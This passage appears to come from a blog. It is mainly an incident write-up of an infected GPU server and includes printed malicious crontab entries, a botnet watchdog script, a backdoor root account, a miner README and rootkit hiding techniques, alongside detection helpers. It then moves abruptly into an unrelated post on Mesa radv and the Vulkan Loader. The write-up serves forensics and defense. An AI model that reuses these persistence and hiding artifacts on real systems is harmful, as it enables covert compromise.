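            seen.add((m.group(1), m.group(2)))
    return sorted(seen)


SAMPLE = [
    "2月 28 22:55:01 GPU CRON[65427]: (root) CMD (/root/.cpan/.cache/update >/dev/null 2>&1)",
    "2月 28 22:55:01 GPU CRON[65428]: (root) CMD (/.dbus/auto >/dev/null 2>&1)",
    "2月 28 22:55:01 GPU CRON[65429]: (yyy) CMD (/dev/shm/.m-1013/dbus-collector.seed)",
    "2月 28 22:55:01 GPU CRON[65430]: (xy) CMD (/home/xy/.cpan/.cache/update >/dev/null 2>&1)",
    "2月 28 22:55:01 GPU CRON[65426]: (CRON) info (No MTA installed, discarding output)",
    "2月 28 22:56:01 GPU CRON[67338]: (root) CMD (/.dbus/auto >/dev/null 2>&1)",
]

for user, cmd in cron_commands(SAMPLE):
    print(user, cmd)
```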

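User account information

The passwd and group files had been tampered with; the trojan even thoughtfully left passwd- and group- behind as backups (most likely written automatically by the account-management tools it used)...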

$ diff /etc/passwd /etc/passwd-
78d77
< ghost:x:0:0::/:/bin/bash
$ diff /etc/group /etc/group-
1c1
< root:x:0:
---
> root:x:0:bin
21c21
< sudo:x:27:omnisky,chz,lzt,gjf,hy,nobody,bin
---
> sudo:x:27:omnisky,chz,lzt,gjf,hy,nobody

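lastlog provides some login information. The ghost (a.k.a. root) account was logged into on February 26 from a host with another USTC IP address. A teacher at the Network Information Center looked it up and found that a network access account belonging to a different lab was logged in on that host.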

ghost pts/2 xxx.xxx.xxx.xx 一 2月 26 02:42:02 +0800 2024

The root entry shows the same time.
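An account like ghost is easy to miss by eye but trivial to find mechanically: any passwd entry other than root whose UID field is 0 has full root privileges. A minimal sketch follows; `extra_uid0_accounts` is a hypothetical helper name, the ghost line is taken from the diff above, and the other two sample lines are made up for illustration.

```python
def extra_uid0_accounts(passwd_text: str):
    """Return account names other than root whose UID is 0."""
    names = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if line.startswith("#") or len(fields) < 7:
            continue  # skip comments and malformed lines
        name, uid = fields[0], fields[2]
        if uid == "0" and name != "root":
            names.append(name)
    return names


SAMPLE = """\
root:x:0:0:root:/root:/bin/bash
lzt:x:1001:1001::/home/lzt:/bin/bash
ghost:x:0:0::/:/bin/bash
"""

print(extra_uid0_accounts(SAMPLE))
```

On a live system the input would be the contents of /etc/passwd, read with a tool that the rootkit is not known to tamper with.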

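Logs and file modification times

syslog had already been rotated, and auth.log had either been rotated or deleted by the intruder.

What remains of the auth logs shows crontab activity as early as January 28: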


Jan 28 00:00:01 GPU CRON[524365]: pam_unix(cron:session): session opened for user root by (uid=0)
Jan 28 00:00:01 GPU CRON[524366]: pam_unix(cron:session): session opened for user xy by (uid=0)
Jan 28 00:00:01 GPU CRON[524367]: pam_unix(cron:session): session opened for user zx by (uid=0)
Jan 28 00:00:01 GPU CRON[524368]: pam_unix(cron:session): session opened for user zx by (uid=0)
Jan 28 00:00:01 GPU CRON[524369]: pam_unix(cron:session): session opened for user spf by (uid=0)
Jan 28 00:00:01 GPU CRON[524365]: pam_unix(cron:session): session closed for user root
Jan 28 00:00:01 GPU CRON[524366]: pam_unix(cron:session): session closed for user xy
Jan 28 00:00:01 GPU CRON[524367]: pam_unix(cron:session): session closed for user zx
Jan 28 00:00:01 GPU CRON[524368]: pam_unix(cron:session): session closed for user zx
Jan 28 00:00:01 GPU CRON[524369]: pam_unix(cron:session): session closed for user spf

Other suspicious files

The root directory had gained a lot of flashy extras.


$ ./busybox ls -alh /
total 13M    
drwxr-xr-x   26 root     root        4.0K Feb 28 11:22 .
drwxr-xr-x   26 root     root        4.0K Feb 28 11:22 ..
drwxr-xr-x    3 10000    jyx         4.0K Feb 25 17:28 .dbus
lrwxrwxrwx    1 root     root           7 Jan 10  2023 bin -> usr/bin
drwxr-xr-x    4 root     root        4.0K Dec  1  2019 boot
drwxr-xr-x    2 root     root        4.0K Dec  1  2019 cdrom
drwxr-xr-x   11 root     root        4.0K Dec  1  2019 data
drwxr-xr-x   24 root     root        4.0K Dec  1  2019 data1
drwxr-xr-x    4 root     root        4.0K Dec  1  2019 data2
drwxr-xr-x   19 root     root        5.6K Dec  1  2019 dev
drwxr-xr-x  149 root     root       12.0K Feb 28 23:44 etc
-rw-r--r--    1 root     root        8.6M Feb 25 17:03 good
drwxr-xr-x   31 root     root        4.0K Feb 28 10:21 home
-rwxr-xr-x    1 root     root       61.4K Dec  1  2019 kwk
lrwxrwxrwx    1 root     root           7 Jan 10  2023 lib -> usr/lib
lrwxrwxrwx    1 root     root           9 Jan 10  2023 lib32 -> usr/lib32
lrwxrwxrwx    1 root     root           9 Jan 10  2023 lib64 -> usr/lib64
lrwxrwxrwx    1 root     root          10 Jan 10  2023 libx32 -> usr/libx32
drwx------    2 root     root       16.0K Dec  1  2019 lost+found
drwxr-xr-x    3 root     root        4.0K Dec  1  2019 media
drwxr-xr-x    2 root     root        4.0K Dec  1  2019 mnt
-rwxr-xr-x    1 root     root        4.0M Dec  1  2019 mx
drwxr-xr-x   24 root     root        4.0K Dec  1  2019 old_os
drwxr-xr-x    7 root     root        4.0K Dec  1  2019 opt
dr-xr-xr-x 1422 root     root           0 Dec  1  2019 proc
drwx------   12 root     root        4.0K Feb 28 23:44 root
drwxr-xr-x   39 root     root        1.3K Feb 29 00:29 run
lrwxrwxrwx    1 root     root           8 Jan 10  2023 sbin -> usr/sbin
drwxr-xr-x   11 root     root        4.0K Dec  1  2019 snap
drwxr-xr-x    2 root     root        4.0K Dec  1  2019 srv
dr-xr-xr-x   13 root     root           0 Dec  1  2019 sys
drwxrwxrwt  647 root     root      148.0K Feb 29 00:30 tmp
drwxr-xr-x   14 root     root        4.0K Dec  1  2019 usr
drwxr-xr-x   16 root     root        4.0K Dec  1  2019 var
drwxrwxr-x    2 root     root        4.0K Feb 28 11:26 x

The new arrivals are /x, /mx, /kwk, /good, and /.dbus.

crontab analysis


$ sudo ls -alh /var/spool/cron/crontabs/
total 28K
drwx-wx--T 2 root crontab 4.0K 2月  26 13:57 .
drwxr-xr-x 3 root root    4.0K 8月  31  2022 ..
-rw------- 1 root crontab  291 2月  25 17:28 root
-rw------- 1 spf  crontab  277 2月  17  2023 spf
-rw------- 1 xy   crontab  233 2月  17  2023 xy
-rw------- 1 yyy  crontab  261 2月  26 13:57 yyy
-rw------- 1 zx   crontab  343 2月  20  2023 zx
$ sudo cat /var/spool/cron/crontabs/yyy
# DO NOT EDIT THIS FILE - edit the master and reinstall.
# (- installed on Mon Feb 26 13:57:19 2024)
# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)
# DO NOT REMOVE THIS LINE. dbus-kernel
* * * * * /dev/shm/.m-1013/dbus-collector.seed
$ sudo cat /var/spool/cron/crontabs/root
# DO NOT EDIT THIS FILE - edit the master and reinstall.
# (/tmp/crontab.ZblArV/crontab installed on Sun Feb 25 17:28:18 2024)
# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)
* * * * * /.dbus/auto >/dev/null 2>&1
* * * * * /root/.cpan/.cache/update >/dev/null 2>&1
$ sudo cat /var/spool/cron/crontabs/zx
# DO NOT EDIT THIS FILE - edit the master and reinstall.
# (.autobotchk1676891606017226.97733 installed on Mon Feb 20 19:13:26 2023)
# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)
0,10,20,30,40,50 * * * * /home/zx/.cpan/dumb.botchk >/dev/null 2>&1
0,10,20,30,40,50 * * * * /home/zx/.cpan/nmop.botchk >/dev/null 2>&1
$ sudo cat /var/spool/cron/crontabs/spf
# DO NOT EDIT THIS FILE - edit the master and reinstall.
# (.autobotchk1676636637503791.1778717 installed on Fri Feb 17 20:23:57 2023)
# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)
0,10,20,30,40,50 * * * * /home/spf/.cpan/spf.botchk >/dev/null 2>&1
$ sudo cat /var/spool/cron/crontabs/xy
# DO NOT EDIT THIS FILE - edit the master and reinstall.
# (cron installed on Fri Feb 17 18:26:23 2023)
# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)
* * * * * /home/xy/.cpan/.cache/update >/dev/null 2>&1

The /home/xy/.cpan/.cache/update script reads as follows:

#!/bin/sh
if test -r /home/xy/.cpan/.cache/mech.pid; then
pid=$(cat /home/xy/.cpan/.cache/mech.pid)
if $(kill -CHLD $pid >/dev/null 2>&1)
then
exit 0
fi
fi
cd /home/xy/.cpan/.cache
./run &>/dev/null

It is simply a watchdog: if the process recorded in mech.pid is no longer alive, it calls run, which in turn starts the botnet client.
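All the malicious crontab entries in this incident run programs from hidden directories or from /dev/shm, which suggests a simple heuristic for spotting them. The sketch below is only that, a heuristic: the choice of suspicious locations is my assumption, `suspicious_entries` is a hypothetical name, it does not handle `@reboot`-style shortcuts or environment assignments, and the backup.sh line is a made-up benign example.

```python
from pathlib import PurePosixPath

# Assumption: world-writable scratch locations are unusual places for cron jobs.
SUSPICIOUS_ROOTS = ("/dev/shm/", "/tmp/")


def suspicious_entries(crontab_text: str):
    """Return executables of crontab entries that live in hidden or scratch paths."""
    flagged = []
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(None, 5)  # five schedule fields, then the command
        if len(fields) < 6:
            continue
        exe = fields[5].split()[0]
        hidden = any(part.startswith(".") for part in PurePosixPath(exe).parts)
        if hidden or exe.startswith(SUSPICIOUS_ROOTS):
            flagged.append(exe)
    return flagged


SAMPLE = """\
# DO NOT EDIT THIS FILE - edit the master and reinstall.
* * * * * /.dbus/auto >/dev/null 2>&1
* * * * * /dev/shm/.m-1013/dbus-collector.seed
0,10,20,30,40,50 * * * * /home/zx/.cpan/nmop.botchk >/dev/null 2>&1
0 3 * * * /usr/local/bin/backup.sh
"""

for exe in suspicious_entries(SAMPLE):
    print(exe)
```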

Functional analysis

Special thanks to @taoky.

/kwk: VirusTotal
- Disguises itself as [kworker/0:0]
- Connects to the #ddoser channel as an IRC bot
/mx: VirusTotal
- A packed Go program

/good is a tar.gz that appears to contain the "dbus" program, which can be used to mine Monero

README: ~~the episode where the malware worries most that you won't know how to use it~~


(: I MAKE THIS FOR FREE, SHARE IT IF YOU LIKE :)
  ==========================================
            noname but not nobody

This miner can run as root or user :)

Simple & easy to use. No naughty backdoor.

Commands :
----------
1. Create config.json first, use : ./mkcfg <Mining Pool:Port> <Worker ID> <Wallet>
2. Start the mining : ./start

Note :
------
For proxy, use : ./mkcfg <Mining Pool Proxy:Port> <Worker ID> <Wallet>

Extra :
------
32       = Change into 32-bit
64       = Change into 64-bit
power-on = Extra command :D

Source files from https://github.com/xmrig (has no virus except you're gay)

dbus/bash: VirusTotal
dbus/hide: VirusTotal
dbus/power-on: VirusTotal
- 作为 IRCBot 连接到 #kaiten 频道
  
  “Kaiten”这个名称源自日语，意为“回转寿司”，可能是因为这种恶意软件就像回转寿司那样在受控系统之间“旋转”指令。通过IRC频道，攻击者可以远程控制和指挥受感染的机器进行各种活动，包括但不限于发动DDoS攻击、窃取数据、安装更多的恶意软件等。
  
  “这下服务器变回转寿司了，最美味的一集” (courtesy @taoky)
- 会把自己假装成 [kworker/0:0]
- 可以执行一系列 DDoS 攻击和 remote code execution 命令
xtra/:
- centos VirusTotal
- ubuntu VirusTotal
- 32 VirusTotal
- 64 VirusTotal

/home/spf/.cpan/: 一个 botnet 程序，里面一堆 Tcl 脚本和一些可执行文件
- hide: VirusTotal
- nobody: 无检出，strings 一把看起来像 Tcl 解释器 + 一些奇怪东西，VirusTotal
/dev/shm/.m-1013/dbus-collector: VirusTotal
/x: 端口扫描和 SSH 暴力攻击程序
- x/ban: VirusTotal
- x/m: VirusTotal
- x/SSH: VirusTotal
/usr/local/lib/dbus-collector/libdbus_x86_64.so: VirusTotal
- 尝试隐藏 dbus_collector，通过 hook readdir{64} 并且解析是否是对 /proc 的列目录；如果是，则返回去掉自己结果的列目录结果，从而达到在 ps 和 htop 等工具中隐藏的目的
/usr/local/lib/network.so: VirusTotal
- 尝试隐藏自己，通过 hook readdir{64} 并且解析是否是对 /proc 的列目录；如果是，则返回去掉自己结果的列目录结果，从而达到在 ps 和 htop 等工具中隐藏的目的
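Because the two libraries above only filter the results of readdir on /proc, a process they hide can still be reached by asking for /proc/<pid> directly. The sketch below compares the two views. It is a minimal illustration of that idea under stated assumptions (the helper names are made up here, and malware that also hooks open or stat would defeat it), not a replacement for a dedicated tool.

```python
import os

def hidden_pids(listed_pids, pid_exists, max_pid):
    """PIDs that answer a direct probe but are missing from the directory listing."""
    listed = set(listed_pids)
    return [pid for pid in range(1, max_pid + 1)
            if pid not in listed and pid_exists(pid)]

def list_proc_pids():
    # os.listdir goes through libc's readdir family, i.e. the hooked code path.
    return [int(name) for name in os.listdir("/proc") if name.isdigit()]

def probe_proc(pid):
    # /proc/<tid> also resolves for non-leader threads, which are never listed,
    # so only count entries whose Tgid equals the probed number.
    try:
        with open(f"/proc/{pid}/status") as status:
            for line in status:
                if line.startswith("Tgid:"):
                    return int(line.split()[1]) == pid
    except OSError:
        return False
    return False

# Self-contained demonstration with fake data: PID 3 exists but is not listed.
print(hidden_pids([1, 2, 5], lambda pid: pid in {1, 2, 3, 5}, max_pid=6))
```

On a live system one would call hidden_pids(list_proc_pids(), probe_proc, max_pid) with max_pid taken from /proc/sys/kernel/pid_max. Processes that start or exit between the listing and the probe can show up as false positives, so any hit should be re-checked.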

总结

病毒已经有 root 权限
由于发现的比较晚，很多日志 rotate 了，并且日志没有配置实时发送到远程服务器等，导致基本很难断定最初的入侵是什么时候发生的。不过基本可以确定，病毒最早在 1 月 28 日或之前就已经黑进系统了。
系统里面一共有四种类型的病毒：挖矿病毒，DDoS肉鸡病毒，远程控制病毒，SSH扫描病毒；同时，有病毒有隐藏功能，会在 /etc/ld.so.preload 里面写上自己的动态库，导致所有动态链接的程序运行前均调用病毒程序
远程控制病毒会互相连接，并且存在通过authorized_keys互相跳转的可能性；但是auth.log已经看不到那么远的日志了，可能是被rotate或者删除了
可以通过publickey方式登陆服务器的账户最好检查一下自己的主机是否已经中毒（因为publickey跳转是一种可能的感染路径，虽然没有读 code 证实）

远程控制病毒用的是 IRC 和黑客以及其他节点保持连接，并且存在对方进一步下载其它payload（比如，勒索病毒）的可能性。

此时只能建议大家赶紧备份数据到自己的机器，同时注意服务器上所有的可执行程序都应该认为是不可信任的：即，存在被病毒感染的可能性。有些存在任意代码执行的文件格式也存在被入侵的理论可能（比如 torch 非 safetensor 的 checkpoint 文件）
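Since the hiding libraries persist through /etc/ld.so.preload, listing what that file asks the dynamic linker to load is a cheap first check. The sketch below only parses the file contents. It assumes entries are separated by whitespace or colons and that '#' starts a comment, and the allowlist parameter is a hypothetical convenience.

```python
def preload_entries(text):
    """Split the contents of an ld.so.preload-style file into library paths."""
    entries = []
    for line in text.splitlines():
        line = line.split("#", 1)[0]  # assumption: '#' starts a comment
        entries.extend(line.replace(":", " ").split())
    return entries

def unexpected_preloads(text, allowlist=()):
    """Entries that are not on the (hypothetical) allowlist of known-good libraries."""
    allowed = set(allowlist)
    return [path for path in preload_entries(text) if path not in allowed]

# The two libraries found in this incident, as they might appear in the file.
sample = (
    "/usr/local/lib/network.so\n"
    "/usr/local/lib/dbus-collector/libdbus_x86_64.so\n"
)
print(unexpected_preloads(sample))
```

On most systems the file does not exist or is empty, so any entry is worth investigating. Reading it from a dynamically linked tool on the infected host is itself subject to the preload hooks, so it is safer to mount the disk from rescue media.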

Mesa radv 源码阅读（一）: 如何跟踪图形栈、Vulkan Loader、Mesa 派发机制 2023-07-02

变更记录:

2023-02-11: 开始写作本文

2023-02-16: 基本完成

2023-07-02: 移出草稿区

Mesa radv 全称 Mesa Vulkan Radeon 驱动，用于 Linux 桌面平台下 AMD Radeon 独立和集成显示卡的 Vulkan 用户态驱动支持。本文主要为备忘性质，记录笔者调试和跟踪代码过程中的发现。

笔者本人接触 Linux 图形栈的时间并不很长，其中很多地方还不甚明了，如有缺漏之处，请批评指正。

您可以在博客对应的仓库的 Issue 区和我取得联系。

本文的实验均开展于截至写作时最新版本的 Arch Linux。
使用的主要软件版本如下：

mesa 22.3.3

https://gitlab.freedesktop.org/mesa/mesa/

vulkan-icd-loader 1.3.240

https://github.com/KhronosGroup/Vulkan-Loader

前言：如何跟踪 Linux 图形栈？

截至目前，笔者认为图形栈的跟踪和开发，较常规的 Linux 服务端开发等工作要更为复杂。

这种复杂性主要来源于：

厂商图形实现是高度定制化的，在通用图形 API (e.g. Vulkan, OpenGL) 下，厂商有很大的自由度来填补从用户程序图形 API 到真正向图形处理器发送命令的过程
- e.g. AMD 的 mesa Vulkan 开源驱动 radv 会经过 vulkan-icd-loader 到 mesa 到 libdrm 到内核态 amdgpu
用户的图形应用程序还需要经过窗口系统和混成器 (compositor) 才能显示到屏幕上，图形实现需要和混成器紧密配合
- X11 (DIX, DDX), GLX, DRI2, DRI3, Wayland, egl…
- 历史包袱比较多

除此之外，上面的两个方面，其中各个环节的接口文档都不甚清晰，且接口演进也比较频繁，很多时候需要「一竿子捅到底」，将各个库和软件的源码连在一起阅读，才知道真正发生了什么。

源码阅读

针对这种情况，首先需要比较方便的 C/C++ 源码阅读软件，笔者目前使用的是 OpenGrok。

该软件对源码的语义理解并不很强，因为其仅仅是采用 ctags 的方法进行简单的解析，对于需要经过预处理器的一些嵌入的宏（比如 #define WSI_CB(cb) PFN_vk##cb cb 这种样式的成员定义宏）支持并不好。其优势主要体现在跳转快速 (HTML 链接点击即跳转)，以及还算方便的 Full search 功能（比如要搜索某个函数指针成员 wait 在哪里被调用，可以搜 "->wait" 和 ".wait"）。某种意义上，笔者认为该软件可以认为是本地部署的、可以看不仅仅是内核的软件代码的增强版本 elixir。

其实感觉可以做一个用 Arch Linux 的 makepkg 构建过程中生成 compile_commands.json 并且用这个信息来指导源码阅读的工作流，最好信息都可以离线 bake 然后静态的托管到某些网站上。目前我还没发现有这样的工具存在。

TODO: 调研静态的 CodeBrowser。

另一个比较有用的准备工作是，把一个软件包的依赖的源码全部下载下来放在一起，统一放到 OpenGrok 里面，这样可以极大加速跨软件包的符号和定义的查找工作。

这里我选择 Arch Linux 的 pacman 包作为起点进行依赖查找。

值得注意的是，Arch 的包管理模型中有 “虚拟包” 的概念，比如 opengl-driver 可以被 depend 和 provide，但是并不对应一个具体的包；这样的依赖很多时候需要人工去 resolve。

TODO: 等整套工具比较完善之后，写一篇博客介绍如何将系列包的源码全部拉下来。

动态跟踪

另一个十分有用的步骤自然是运行时的行为跟踪了。

行为跟踪主要是采用 GDB + debuginfod + (感兴趣的软件包的) -debug 软件包。

在没有加载调试符号的情况下，GDB 的 step 似乎会直接越过外部函数，这种时候可以考虑 layout asm 看汇编，用 stepi 进到 call 指令里面去，GDB 此时的 backtrace 会打印出该函数所在地址对应的动态链接库 (当然，应该是从进程地址空间信息 /proc/<PID>/maps 反查的)，但具体的函数则不详。动态链接库信息可以用来让你想想到底是什么东西缺符号。

正确配置的 debuginfod 可以完成自动拉取加载的动态链接库的符号的工作，不过要看到源码本身还是需要安装 debug 包。

安装好 -debug 包后，对应的源码会在 /usr/src/debug/ 下。

debug 包的主要获取方法有两种，详情可以参考 Debugging/Getting traces - ArchWiki：

特定的 Archlinux mirror
- https://geo.mirror.pkgbuild.com/
- 但是个别包似乎会出现 debug 包内源码不全的情况，如 vulkan-icd-loader，不清楚具体原因；方法 2 无此问题
自己编译

关于如何编译 debug 包，值得简单记两笔。

打 debug 包需要

拉 PKGBUILD
- 可以考虑用 asp 这个工具自动从 GitHub (https 的话需要配合 proxychains 科学上网) 上面拉对应的 recipe
- pbget 这个工具不知道是否可以用于自动化的把依赖项目的 recipe 全部拉下来 (?)
  - 我自己测试是不行，不过是用 Python 3 + pyalpm 写的，有一定的研究和修改价值
进行编译
- ArchWiki 推荐使用 clean chroot 编译，这样也方便设定单独的 makepkg 的设置
- 使用 Wiki 中描述的，方便的方法如下：
  1. 安装 devtools 包
  2. 更改 chroot 环境内的 makepkg 配置，启用 OPTIONS 中的 debug 和 strip
    - /usr/share/devtools/makepkg-${arch}.conf 这里 arch 选择 x86_64
    - (optional) 把并行编译的 -j 也设置好，不过有些构建系统会自动检测并启用并行编译
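  3. Run extra-x86_64-build in the directory that contains the PKGBUILD, then install both the -debug package (which carries the sources) and the binary package (pacman -U)
    - It does not matter if the package checks fail; both packages must be installed, because the debug symbols are presumably matched to the binary through an identifier generated per build
    - To pass arguments through to makepkg, add two -- separators, e.g. extra-x86_64-build -- -- --skippgpcheck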

在看 elfutils 的时候同时看到了一个工具 eu-stack，可以用来截取某个进程当前时刻所有线程的栈信息，并且可以加选项 -m 来用 debuginfod 进行符号查找。

感觉在分析 GUI 程序高 CPU 占用的性能分析的场合，eu-stack 可以作为一种采样手段使用。

Vulkan Loader

Vulkan Loader 是垫在各个 Vulkan 驱动和用户程序中间的层，主要用来解决多设备枚举使用的问题。

驱动枚举

Vulkan Loader 有默认的 ICD (Installable Client Driver) 的搜索路径，向系统中安装的驱动程序会通过在给定的 ICD 路径（可能是文件夹，也可能是 Windows 注册表）中写入信息的方式来向 Vulkan Loader 报告自己的信息。

例如，/usr/share/vulkan/icd.d/radeon_icd.x86_64.json 中的信息如下：

{
    "ICD": {
        "api_version": "1.3.230",
        "library_path": "/usr/lib/libvulkan_radeon.so"
    },
    "file_format_version": "1.0.0"
}

可以看到，核心的信息是 library_path。(Ref: LoaderDriverInterface.md @ Vulkan-Loader)

另一种传入 ICD 信息的方法是 VK_DRIVER_FILES 环境变量（不过在 root 权限下无效），可以通过指定这个变量的方式，强制 Vulkan Loader 只考虑某些路径。

比如 VK_DRIVER_FILES=/usr/share/vulkan/icd.d/radeon_icd.x86_64.json vulkaninfo 可以只启用 mesa radv 实现。
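To make the manifest format concrete, here is a small sketch that reads an ICD manifest like the one above and builds the environment override. The helper names are invented for illustration, and using os.pathsep as the list separator for VK_DRIVER_FILES is an assumption based on the usual platform convention.

```python
import json
import os

RADEON_MANIFEST = """
{
    "ICD": {
        "api_version": "1.3.230",
        "library_path": "/usr/lib/libvulkan_radeon.so"
    },
    "file_format_version": "1.0.0"
}
"""

def icd_library_path(manifest_text):
    """Return (library_path, api_version) from a Vulkan ICD manifest."""
    icd = json.loads(manifest_text)["ICD"]
    return icd["library_path"], icd.get("api_version")

def driver_files_env(manifest_paths):
    # Assumption: several manifests are joined with the platform path separator.
    return {"VK_DRIVER_FILES": os.pathsep.join(manifest_paths)}

print(icd_library_path(RADEON_MANIFEST))
print(driver_files_env(["/usr/share/vulkan/icd.d/radeon_icd.x86_64.json"]))
```

The resulting dictionary can be merged into os.environ (or passed as env= to subprocess.run) before launching a tool such as vulkaninfo.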

驱动入口发现

每个驱动要实现 vk_icdGetInstanceProcAddr 这个调用，和 (>= Version 4) vk_icdGetPhysicalDeviceProcAddr 这个调用：

typedef void (VKAPI_PTR *PFN_vkVoidFunction)(void);

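// Global calls such as vkCreateInstance pass NULL as the first parameter
// Use this call first to obtain `vkGetDeviceProcAddr`, then make device-level calls through it
VKAPI_ATTR PFN_vkVoidFunction VKAPI_CALL vk_icdGetInstanceProcAddr(
   VkInstance instance,
   const char* pName
);

// Mainly used to dispatch Vulkan APIs whose first parameter is a VkPhysicalDevice
// - otherwise the Vulkan Loader treats the command as a logical device command
//   and tries to pass in a VkDevice object
// Typical use: physical-device extensions that the loader does not know about
// (>= Version 7) this entry point must be obtainable through vk_icdGetInstanceProcAddr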
PFN_vkVoidFunction vk_icdGetPhysicalDeviceProcAddr(
   VkInstance instance,
   const char* pName
);

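Some vendors implement the user-space side of several APIs in a single library (e.g. libGLX_nvidia.so.0 in nvidia_icd.json), but a driver must not occupy the official Vulkan function names itself.

A user program that is dynamically linked against the Vulkan Loader obtains the addresses of vkGetInstanceProcAddr and vkGetDeviceProcAddr through the system routines (dlsym or GetProcAddress), and then calls these two functions to look up the addresses of all other Vulkan API entry points.

typedef PFN_vkVoidFunction (VKAPI_PTR *PFN_vkGetInstanceProcAddr)(VkInstance instance, const char* pName);
typedef PFN_vkVoidFunction (VKAPI_PTR *PFN_vkGetDeviceProcAddr)(VkDevice device, const char* pName);

The behaviour of the Loader's vkGetInstanceProcAddr is described in the official documentation.

In short, the Loader searches downwards with vk_icdGetInstanceProcAddr; whatever it finds is recorded in a jump table, so the terminator can later jump straight to it without looking it up again.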

驱动 Vulkan 对象句柄要求

Ref: https://github.com/KhronosGroup/Vulkan-Loader/blob/main/docs/LoaderDriverInterface.md#driver-dispatchable-object-creation

另一个值得了解的是 Vulkan 对象模型。3.3 Object Model @ Vulkan Spec 中提到，Vulkan API 层面提供的 VkXXXXX 等类型均为 Vulkan 对象的句柄，句柄分为可分派的 (dispatchable) 和不可分派的 (non-dispatchable) 两种。

可分派句柄 VK_DEFINE_HANDLE(): 指向某对用户不可见的具体实现类型的指针
- 截至 Vulkan SDK 1.3.236 有 VkInstance, VkPhysicalDevice, VkDevice, VkQueue, VkCommandBuffer
不可分派句柄 VK_DEFINE_NON_DISPATCHABLE_HANDLE()：64-bit 整数类型，具体意义由实现决定
- 如果开启了 Private Data 扩展的话，显然也得是指向内部实现类型的某指针（类似可分派句柄）
- 否则，实现可以决定在这 64-bit 里面直接编码好信息，不用指针

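On top of this, the Vulkan Loader requires that whenever a driver returns a dispatchable handle:

The first sizeof(uintptr_t) bytes of the internal object the handle points to are left free, so that the Vulkan Loader can replace the value stored there with the address of its jump table
- This also means the internal object has to be POD; otherwise something like a vtable pointer may be placed at the start of the instance and conflict with this requirement
The reserved slot must be set to ICD_LOADER_MAGIC (currently 0x01CDC0DE) by calling set_loader_magic_value from include/vulkan/vk_icd.h; after receiving the handle, the Vulkan Loader uses valid_loader_magic_value to check that the driver implemented this requirement correctly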
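The layout rule can be modelled with ctypes. In the sketch below the union and the two helper functions mirror the names mentioned above, but FakeDriverDevice and its fields are hypothetical, and c_size_t is used as a stand-in for uintptr_t; the masking in valid_loader_magic_value follows my recollection of vk_icd.h and should be treated as an assumption.

```python
import ctypes

ICD_LOADER_MAGIC = 0x01CDC0DE

class LoaderData(ctypes.Union):
    # Pointer-sized slot: the driver writes the magic number, the loader later
    # overwrites it with a pointer to its dispatch (jump) table.
    _fields_ = [("loaderMagic", ctypes.c_size_t),   # stand-in for uintptr_t
                ("loaderData", ctypes.c_void_p)]

class FakeDriverDevice(ctypes.Structure):
    # Hypothetical driver object; the loader slot has to be the first member.
    _fields_ = [("loader_data", LoaderData),
                ("queue_count", ctypes.c_uint32)]

def set_loader_magic_value(obj):
    obj.loader_data.loaderMagic = ICD_LOADER_MAGIC

def valid_loader_magic_value(obj):
    return (obj.loader_data.loaderMagic & 0xFFFFFFFF) == ICD_LOADER_MAGIC

dev = FakeDriverDevice()
set_loader_magic_value(dev)          # driver side, at object creation
print(valid_loader_magic_value(dev))

dev.loader_data.loaderData = 0x1000  # loader side: install a (fake) table address
print(valid_loader_magic_value(dev))
```

After the loader has installed its pointer the magic value is gone, which is why the check only makes sense at the moment the handle is handed over.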

特例: WSI 扩展

Ref: https://github.com/KhronosGroup/Vulkan-Loader/blob/main/docs/LoaderDriverInterface.md#handling-khr-surface-objects-in-wsi-extensions

在下面的平台上，VkSurfaceKHR 可以由 Vulkan Loader 负责创建和销毁：

Wayland, XCB, Xlib
Windows
Android, MacOS, QNX

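For the corresponding vkCreateXXXSurfaceKHR call, the Loader creates a VkIcdSurfaceXXX structure; when the driver receives the VkSurfaceKHR it can treat it as a pointer to VkIcdSurfaceXXX.

However, if the driver wants to take over surface handling itself, it only needs to expose all the entry points required by the WSI KHR extensions to the Loader (creation and destruction, querying surface properties and present modes, creating swapchains).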

Mesa Vulkan radv

Mesa 是一个相对比较庞大的项目。

本次要看的 Mesa Vulkan radv 驱动的代码主要分布在：

src/amd/vulkan/: radv_ 开头的主要代码
src/vulkan: 驱动公共设施

Mesa 的构建系统使用 Meson，src/amd/vulkan/meson.build 中的 libvulkan_radeon 就是构建出的 radv 驱动动态链接库了。

函数派发

Ref: https://gitlab.freedesktop.org/mesa/mesa/-/blob/main/docs/vulkan/dispatch.rst

我们先看 vk_icdGetInstanceProcAddr 的派发流程：

vk_icdGetInstanceProcAddr (src/amd/vulkan/radv_device.c)
radv_GetInstanceProcAddr (src/amd/vulkan/radv_device.c)
vk_instance_get_proc_addr (src/vulkan/runtime/vk_instance.c)

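The radv_instance_entrypoints passed in is a global variable holding the function pointers of the driver's instance-level implementation. Its contents are assigned in src/amd/vulkan/radv_entrypoints.c, which is generated during the build, and its type is the vk_instance_entrypoint_table struct defined in src/vulkan/util/vk_dispatch_table.h, which is also generated during the build.

radv_entrypoints.c declares many weak symbols of the form radv_XXXX and collects them into the tables

radv_instance_entrypoints
radv_physical_device_entrypoints
radv_device_entrypoints
sqtt_device_entrypoints
metro_exodus_device_entrypoints
rra_device_entrypoints

each filled with the values of all the weak symbols. By the nature of weak symbols, if the corresponding function is not defined anywhere else in the program, its entry is null.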

vk_dispatch_table.h 和 vk_dispatch_table.c 本身是用 vk_dispatch_table_gen.py 和 Vulkan Registry XML 生成出来的。

而常用的这几个派发用的函数都是在生成的 vk_dispatch_table.c 中定义的：

vk_instance_dispatch_table_get_if_supported
vk_physical_device_dispatch_table_get_if_supported
vk_device_dispatch_table_get_if_supported

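If a function is not actually implemented (for example radv_GetDeviceSubpassShadingMaxWorkgroupSizeHUAWEI, a Huawei extension that radv obviously does not provide), the dispatch-table lookup functions above return NULL for it.

As for the vk_instance_dispatch_table that shows up in places such as CreateDevice, it is the result of merging several entrypoint tables, which is how, for instance, a missing radv_xxx falls back to vk_common_xxx.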
